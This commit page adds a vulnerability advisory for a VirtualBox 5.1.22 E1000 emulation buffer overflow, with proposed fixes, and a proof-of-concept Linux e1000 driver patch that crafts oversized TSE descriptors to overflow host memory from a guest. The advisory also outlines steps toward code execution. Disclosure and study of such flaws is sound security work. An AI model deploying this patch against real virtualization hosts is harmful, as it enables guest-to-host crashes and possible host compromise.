doc files without kernel deb packages

fundacion-sadosky · Sep 25, 2017 · 49585eb · 49585eb
commit 49585eb
Show file tree

Hide file tree

Showing 3 changed files with 404 additions and 0 deletions.
diff --git a/README.rst b/README.rst
@@ -0,0 +1,203 @@
+***************************************
+VirtualBox E1000 device buffer overflow
+***************************************
+
+
+Introduction
+============
+
+The following document details a bug active in the latest VirtualBox release (v5.1.22), in the guest device emulation component ``DevE1000`` (*Intel 82540EM Ethernet Controller Emulation*), in the function ``e1kFallbackAddToFrame``, which leads to a buffer overflow in the host when the guest OS is controlled by an attacker.
+
+The vulnerability was corroborated with both a Linux (Ubuntu 16.04) and a Windows (v8.1) host running a Linux (also Ubuntu 16.04) guest, but the vulnerability could be triggered in many different host/guest combinations. In all scenarios the default network configuration is assumed: only one network adapter **attached to NAT** of type **Intel PRO/1000 MT Desktop (82540EM)**.
+
+Since control structures (including function pointers) can be overwritten with attacker controlled data, it is safe to assume that remote code execution could be achieved in many scenarios.
+
+
+Bug description and exploitation
+================================
+
+The VirtualBox code that implements the emulation of the Intel 82540EM Ethernet Controller, in ``src/VBox/Devices/Network/DevE1000.cpp``, has part of the functionality of the hardware TCP Segmentation in the function ``e1kFallbackAddToFrame()``:
+
+.. code-block:: c
+
+   static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc,
+                                    bool fOnWorkerThread)
+   {
+   #ifdef VBOX_STRICT
+       PPDMSCATTERGATHER pTxSg = pThis->CTX_SUFF(pTxSg);
+       Assert(e1kGetDescType(pDesc) == E1K_DTYP_DATA);
+       Assert(pDesc->data.cmd.fTSE);
+       Assert(!e1kXmitIsGsoBuf(pTxSg));
+   #endif
+
+       uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN +
+                               pThis->contextTSE.dw3.u16MSS;
+       Assert(u16MaxPktLen != 0);
+       Assert(u16MaxPktLen < E1K_MAX_TX_PKT_SIZE);
+
+This function correctly checks that the max TX packet length (``u16MaxPktLen``) is below the standard maximum of 16288 bytes (``E1K_MAX_TX_PKT_SIZE``), but does it in the form of an ``Assert()`` macro that will be disabled in a release build, effectively leaving the check useless for the end user. This can be contrasted to the analogous function ``e1kAddToFrame()``, which enforces the check with an explicit ``if`` instead of the ``Assert()``:
+
+.. code-block:: c
+
+   static bool e1kAddToFrame(PE1KSTATE pThis, RTGCPHYS PhysAddr,
+                             uint32_t cbFragment)
+   {
+       PPDMSCATTERGATHER   pTxSg    = pThis->CTX_SUFF(pTxSg);
+       bool const          fGso     = e1kXmitIsGsoBuf(pTxSg);
+       uint32_t const      cbNewPkt = cbFragment + pThis->u16TxPktLen;
+
+       if (RT_UNLIKELY( !fGso && cbNewPkt > E1K_MAX_TX_PKT_SIZE ))
+       {
+           E1kLog(("%s Transmit packet is too large: %u > %u(max)\n",
+                   pThis->szPrf, cbNewPkt, E1K_MAX_TX_PKT_SIZE));
+           return false;
+       }
+
+The difference between the use of the normal function and the fallback (decided in ``e1kXmitDesc()``) depends on two factors, that the TSE flag is enabled in the descriptors (controlled by the guest) and that the GSO is disabled. The latter depends on many factors, and hence there are many ways to disable it, but the most convenient is to enable the loopback mode, which is configured through the Receive Control Register (in the ``RCTL.LBM`` bits), also controlled by the guest OS.
+
+Enabling the loopback mode will make ``e1kXmitAllocBuf()`` use the ``aTxPacketFallback`` buffer (*Transmit packet buffer use for TSE fallback and loopback*) for the allocation of the PDM scatter/gather buffer, with the mentioned length of 16288 bytes (``E1K_MAX_TX_PKT_SIZE``), and to signal that GSO will be disabled, by setting a ``NULL`` in ``pvUser``.
+
+.. code-block:: c
+
+   if (RT_LIKELY(GET_BITS(RCTL, LBM) != RCTL_LBM_TCVR))
+   {
+
+      ...
+
+   }
+   else
+   {
+     /* Create a loopback using the fallback buffer and preallocated SG. */
+     AssertCompileMemberSize(E1KSTATE, uTxFallback.Sg, 8 * sizeof(size_t));
+     pSg = &pThis->uTxFallback.Sg;
+     pSg->fFlags      = PDMSCATTERGATHER_FLAGS_MAGIC |
+                        PDMSCATTERGATHER_FLAGS_OWNER_3;
+     pSg->cbUsed      = 0;
+     pSg->cbAvailable = 0;
+     pSg->pvAllocator = pThis;
+     pSg->pvUser      = NULL; /* No GSO here. */
+     pSg->cSegs       = 1;
+     pSg->aSegs[0].pvSeg = pThis->aTxPacketFallback;
+     pSg->aSegs[0].cbSeg = sizeof(pThis->aTxPacketFallback);
+   }
+
+This will cause the call to the function ``e1kXmitIsGsoBuf()`` (inside ``e1kXmitDesc()``) to return ``False`` and, with the TSE enabled in the data descriptor, the execution flow will go to ``e1kFallbackAddToFrame()`` (instead of the safer ``e1kAddToFrame()``, with the correct check).
+
+.. code-block:: c
+
+  /*
+   * Add the descriptor data to the frame.  If the frame is complete,
+   * transmit it and reset the u16TxPktLen field.
+   */
+  if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
+  {
+
+    ...
+
+  }
+  else if (!pDesc->data.cmd.fTSE)
+  {
+
+    ...
+
+  }
+  else
+  {
+      STAM_COUNTER_INC(&pThis->StatTxPathFallback);
+      rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
+  }
+
+Inside ``e1kFallbackAddToFrame()``, with the aforementioned check disabled in a release build, the MSS can be set arbitrarily large (up to 64K minus the HDRLEN), hence allowing an arbitrarily large ``DTALEN`` to be passed to ``e1kFallbackAddSegment()``:
+
+.. code-block:: c
+
+   /*
+   * Carve out segments.
+   */
+   int rc;
+   do
+   {
+     /* Calculate how many bytes we have left in this TCP segment */
+     uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
+     if (cb > pDesc->data.cmd.u20DTALEN)
+     {
+         /* This descriptor fits completely into current segment */
+         cb = pDesc->data.cmd.u20DTALEN;
+         rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb,
+                     pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
+
+The function ``e1kFallbackAddSegment()`` will use this value (now as argument ``u16Len``) to copy from guest memory into the buffer ``aTxPacketFallback`` in host memory (through ``PDMDevHlpPhysRead()``) without further checks to this length, thus causing the buffer overflow (of a buffer capacity of 16288 bytes with a memory size of up to 64K).
+
+.. code-block:: c
+
+  static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr,
+                     uint16_t u16Len, bool fSend, bool fOnWorkerThread)
+  {
+      int rc = VINF_SUCCESS;
+      /* TCP header being transmitted */
+      struct E1kTcpHeader *pTcpHdr = (struct E1kTcpHeader *)
+              (pThis->aTxPacketFallback + pThis->contextTSE.tu.u8CSS);
+      /* IP header being transmitted */
+      struct E1kIpHeader *pIpHdr = (struct E1kIpHeader *)
+              (pThis->aTxPacketFallback + pThis->contextTSE.ip.u8CSS);
+
+      E1kLog3(("%s e1kFallbackAddSegment: Length=%x, remaining payload=%x,
+               header=%x, send=%RTbool\n", pThis->szPrf, u16Len,
+               pThis->u32PayRemain, pThis->u16HdrRemain, fSend));
+      Assert(pThis->u32PayRemain + pThis->u16HdrRemain > 0);
+
+      PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
+                        pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);
+
+To make this vulnerability more predisposed to a RCE, it has to be noted that the variable just after the buffer is its index (``u16TxPktLen``), used to write on it (as an offset on the argument of ``PDMDevHlpPhysRead()``). So controlling this value with an initial buffer overflow (caused by a first data descriptor of length ``E1K_MAX_TX_PKT_SIZE`` + 2 bytes) would then allow to write (in a second call to ``PDMDevHlpPhysRead()`` with a second data descriptor) any memory address up to 64K of distance from the buffer, without being necessary to overwrite all the memory in-between  (which would make the attack more complicated, trying to avoid a potential crash).
+
+A (minor) complication in this attack vector is worth mentioning for completeness: there is what seems like a bug in ``e1kXmitAllocBuf()``, where in the case of being in loopback mode, ``cbTxAlloc`` (*Number of bytes in next packet*) is not reseted to zero, as it is done in the normal case ( in the other branch of its ``if``). This causes the thread to get stuck in the ``while`` loop of ``e1kLocateTxPacket()`` (inside ``e1kXmitPending()``):
+
+.. code-block:: c
+
+   while (e1kLocateTxPacket(pThis))
+   {
+       fIncomplete = false;
+       /* Found a complete packet, allocate it. */
+       rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
+       /* If we're out of bandwidth we'll come back later. */
+       if (RT_FAILURE(rc))
+           goto out;
+       /* Copy the packet to allocated buffer and send it. */
+       rc = e1kXmitPacket(pThis, fOnWorkerThread);
+       /* If we're out of bandwidth we'll come back later. */
+       if (RT_FAILURE(rc))
+           goto out;
+   }
+
+This seems to happen because ``e1kLocateTxPacket()`` prematurely returns with ``True`` in the case where ``cbTxAlloc`` is not zero, and doesn't reach the code that checks if ``iTxDCurrent`` is equal to  ``nTxDFetched`` (the usual case where all descriptors have been processed), which would normally make the function return ``False``, effectively terminating the aforementioned loop.
+
+.. code-block:: c
+
+   static bool e1kLocateTxPacket(PE1KSTATE pThis)
+   {
+       LogFlow(("%s e1kLocateTxPacket: ENTER cbTxAlloc=%d\n",
+                pThis->szPrf, pThis->cbTxAlloc));
+       /* Check if we have located the packet already. */
+       if (pThis->cbTxAlloc)
+       {
+           LogFlow(("%s e1kLocateTxPacket: RET true cbTxAlloc=%d\n",
+                    pThis->szPrf, pThis->cbTxAlloc));
+           return true;
+       }
+
+This translates to the requirement that the first packet sent to the device (after setting the loopback mode) has to be the one that triggers the overflow, otherwise the VM will hang (ending with a DoS rather than a RCE).
+
+
+Proof of concept
+================
+
+Because the setup of the network device is far from trivial, and to avoid building a custom driver for it, the E1000 driver of a generic Linux kernel was modified to generate the descriptors (both context and data) that trigger the overflow. This modified kernel is attached to this report as a PoC of the vulnerability, it has been tested in an Ubuntu 16.04 guest, causing a crash both in Linux and Windows hosts.
+
+
+Possible solutions
+==================
+
+The main solution to this issue is to convert the checks made as ``Assert()`` in ``e1kFallbackAddToFrame`` to explicit checks as ``if`` statements, that would operate in a release build, similar to what is done in ``e1kAddToFrame()``.
+
+Additional (defensive) checks could also be placed in ``e1kFallbackAddSegment()`` (and similarly in ``e1kAddToFrame``) before the call to ``PDMDevHlpPhysRead()`` to explicitly check for potential overflows of any host buffer with guest memory.
diff --git a/poc/0001-e1k-buffer-overflow-poc.patch b/poc/0001-e1k-buffer-overflow-poc.patch
@@ -0,0 +1,162 @@
+From 1aa5b773716e6dd5fc7ea240b5808ababc168851 Mon Sep 17 00:00:00 2001
+From: Lucas Molas <>
+Date: Tue, 25 Apr 2017 18:42:45 -0300
+Subject: [PATCH] e1k buffer overflow poc
+
+---
+ drivers/net/ethernet/intel/e1000/e1000_main.c | 76 +++++++++++++++++++++++++++
+ 1 file changed, 76 insertions(+)
+
+diff --git a/drivers/net/ethernet/intel/e1000/e1000_main.c b/drivers/net/ethernet/intel/e1000/e1000_main.c
+index f42129d..b8c6aac 100644
+--- a/drivers/net/ethernet/intel/e1000/e1000_main.c
++++ b/drivers/net/ethernet/intel/e1000/e1000_main.c
+@@ -32,6 +32,7 @@
+ #include <linux/prefetch.h>
+ #include <linux/bitops.h>
+ #include <linux/if_vlan.h>
++#include <linux/printk.h>
+
+ char e1000_driver_name[] = "e1000";
+ static char e1000_driver_string[] = "Intel(R) PRO/1000 Network Driver";
+@@ -39,6 +40,8 @@ static char e1000_driver_string[] = "Intel(R) PRO/1000 Network Driver";
+ const char e1000_driver_version[] = DRV_VERSION;
+ static const char e1000_copyright[] = "Copyright (c) 1999-2006 Intel Corporation.";
+
++#define VBOX_BUFFER_OVERFLOW_POC
++
+ /* e1000_pci_tbl - PCI Device ID Table
+  *
+  * Last entry must be all 0s
+@@ -1797,6 +1800,14 @@ static void e1000_setup_rctl(struct e1000_adapter *adapter)
+ 		E1000_RCTL_RDMTS_HALF |
+ 		(hw->mc_filter_type << E1000_RCTL_MO_SHIFT);
+
++#ifdef VBOX_BUFFER_OVERFLOW_POC
++
++	rctl |= E1000_RCTL_BAM | E1000_RCTL_LBM_TCVR |
++		E1000_RCTL_RDMTS_HALF |
++		(hw->mc_filter_type << E1000_RCTL_MO_SHIFT);
++
++#endif /* VBOX_BUFFER_OVERFLOW_POC */
++
+ 	if (hw->tbi_compatibility_on == 1)
+ 		rctl |= E1000_RCTL_SBP;
+ 	else
+@@ -1844,6 +1855,8 @@ static void e1000_setup_rctl(struct e1000_adapter *adapter)
+ 		 */
+ 	}
+
++	printk(KERN_WARNING "VBOX: e1000_setup_rctl: Writing to RCTL: %x\n", rctl);
++
+ 	ew32(RCTL, rctl);
+ }
+
+@@ -2815,6 +2828,45 @@ static bool e1000_tx_csum(struct e1000_adapter *adapter,
+ 	context_desc->tcp_seg_setup.data = 0;
+ 	context_desc->cmd_and_length = cpu_to_le32(cmd_len);
+
++#ifdef VBOX_BUFFER_OVERFLOW_POC
++
++	#define FAKE_PAYLEN_VALUE (50 * 1000)
++	#define FAKE_MSS_VALUE FAKE_PAYLEN_VALUE
++
++	/* Taken from e1000_tso() */
++	u32 cmd_length = 0;
++	u16 ipcse = 0, tucse, mss;
++	u8 ipcss, ipcso, tucss, tucso, hdr_len;
++
++	hdr_len = skb_transport_offset(skb) + tcp_hdrlen(skb);
++	mss = FAKE_MSS_VALUE;
++
++	ipcse = 0;
++
++	ipcss = skb_network_offset(skb);
++	ipcso = (void *)&(ip_hdr(skb)->check) - (void *)skb->data;
++	tucss = skb_transport_offset(skb);
++	tucso = (void *)&(tcp_hdr(skb)->check) - (void *)skb->data;
++	tucse = 0;
++
++
++	cmd_length |= (E1000_TXD_CMD_DEXT | E1000_TXD_CMD_TSE |
++		       E1000_TXD_CMD_TCP | FAKE_PAYLEN_VALUE);
++
++	context_desc->lower_setup.ip_fields.ipcss  = ipcss;
++	context_desc->lower_setup.ip_fields.ipcso  = ipcso;
++	context_desc->lower_setup.ip_fields.ipcse  = cpu_to_le16(ipcse);
++	context_desc->upper_setup.tcp_fields.tucss = tucss;
++	context_desc->upper_setup.tcp_fields.tucso = tucso;
++	context_desc->upper_setup.tcp_fields.tucse = cpu_to_le16(tucse);
++	context_desc->tcp_seg_setup.fields.mss     = cpu_to_le16(mss);
++	context_desc->tcp_seg_setup.fields.hdr_len = hdr_len;
++	context_desc->cmd_and_length = cpu_to_le32(cmd_length);
++	/* End of extraction from  e1000_tso() */
++
++#endif /* VBOX_BUFFER_OVERFLOW_POC */
++
++
+ 	buffer_info->time_stamp = jiffies;
+ 	buffer_info->next_to_watch = i;
+
+@@ -3008,6 +3060,18 @@ static void e1000_tx_queue(struct e1000_adapter *adapter,
+ 	if (unlikely(tx_flags & E1000_TX_FLAGS_NO_FCS))
+ 		txd_lower &= ~(E1000_TXD_CMD_IFCS);
+
++#ifdef VBOX_BUFFER_OVERFLOW_POC
++
++	if ((txd_lower & E1000_TXD_CMD_DEXT) == 0)
++		return;
++		/* Skip legacy packets, they can't trigger the overflow,
++		 * and the first descriptor that VBox receives has to be
++		 * the one that causes the overflow (due to the bug in
++		 * the loopback mode memory allocation.
++		 */
++
++#endif /* VBOX_BUFFER_OVERFLOW_POC */
++
+ 	i = tx_ring->next_to_use;
+
+ 	while (count--) {
+@@ -3016,6 +3080,14 @@ static void e1000_tx_queue(struct e1000_adapter *adapter,
+ 		tx_desc->buffer_addr = cpu_to_le64(buffer_info->dma);
+ 		tx_desc->lower.data =
+ 			cpu_to_le32(txd_lower | buffer_info->length);
++
++#ifdef VBOX_BUFFER_OVERFLOW_POC
++
++		tx_desc->lower.data =
++			cpu_to_le32(txd_lower | E1000_TXD_CMD_TSE | FAKE_PAYLEN_VALUE);
++
++#endif /* VBOX_BUFFER_OVERFLOW_POC */
++
+ 		tx_desc->upper.data = cpu_to_le32(txd_upper);
+ 		if (unlikely(++i == tx_ring->count))
+ 			i = 0;
+@@ -3139,6 +3211,7 @@ static netdev_tx_t e1000_xmit_frame(struct sk_buff *skb,
+ 		return NETDEV_TX_OK;
+
+ 	mss = skb_shinfo(skb)->gso_size;
++	printk(KERN_WARNING "VBOX: e1000_xmit_frame: mss = skb_shinfo(skb)->gso_size = %u\n", mss);
+ 	/* The controller does a simple calculation to
+ 	 * make sure there is enough room in the FIFO before
+ 	 * initiating the DMA for each buffer.  The calc is:
+@@ -3182,6 +3255,8 @@ static netdev_tx_t e1000_xmit_frame(struct sk_buff *skb,
+ 			}
+ 		}
+ 	}
++	printk(KERN_WARNING "VBOX: e1000_xmit_frame: mss after manipulation: %u\n", mss);
++
+
+ 	/* reserve a descriptor for the offload context */
+ 	if ((mss) || (skb->ip_summed == CHECKSUM_PARTIAL))
+@@ -3234,6 +3309,7 @@ static netdev_tx_t e1000_xmit_frame(struct sk_buff *skb,
+ 	first = tx_ring->next_to_use;
+
+ 	tso = e1000_tso(adapter, tx_ring, skb, protocol);
++	printk(KERN_WARNING "VBOX: e1000_xmit_frame: e1000_tso: %d\n", tso);
+ 	if (tso < 0) {
+ 		dev_kfree_skb_any(skb);
+ 		return NETDEV_TX_OK;
+-- 
+2.7.4
+